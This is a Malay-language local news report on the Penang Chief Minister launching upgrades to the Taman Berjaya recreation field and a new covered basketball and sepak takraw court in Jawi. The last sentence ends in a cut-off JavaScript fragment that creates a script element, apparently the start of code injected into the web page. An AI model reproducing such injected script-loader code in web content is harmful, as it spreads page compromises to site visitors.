Penarafan kawasan riadah Taman Berjaya dimanfaat penduduk

Oleh: ZAINULFAQAR YAACOB

Gambar : LAW SUUN TING

JAWI – Ketua Menteri, Y.A.B. Tuan Lim Guan Eng menyempurnakan majlis pecah tanah penarafan padang Taman Berjaya serentak dengan perasmian pembukaan gelanggang berbumbung bola keranjang dan sepak takraw di sini baru-baru ini.

Ahli Dewan Undangan Negeri (ADUN) Jawi, Soon Lip Chee dalam ucapannya berkata, kos penarafan gelanggang berbumbung yang telah siap itu menelan belanja RM200,0000 daripada peruntukan Ketua Menteri.

“Ini merupakan suatu sumbangan yang besar daripada Ketua Menteri, di mana ia memberi peluang kepada muda-mudi bermain bola keranjang dan sepak takraw dengan lebih selesa di sini,” ujar beliau pada majlis tersebut.

Exco Kerja Raya, Pengangkutan dan Utiliti, Lim Hock Seng dan Yang di-Pertua Majlis Perbadaran Seberang Perai (MPSP), Dato’ Maimunah Mohd. Sharif turut hadir pada majlis berkenaan.

Hadir sama, perwakilan Persatuan Bola Keranjang Seberang Perai Selatan di sini.

Menurut Lip Chee, sebelum ini gelanggang berusia lebih lapan tahun itu turut tidak mempunyai kelengkapan yang sempurna.

“Maka, saya berharap dengan kelengkapan yang lebih sempurna kini dapat dimanfaat oleh penduduk yang begitu padat di sini,”jelasnya sambil mengharap komuniti setempat dapat mencegah amalan vendalisme di kawasan riadah tersebut kelak.var d=document;var s=d.createElement(‘script’);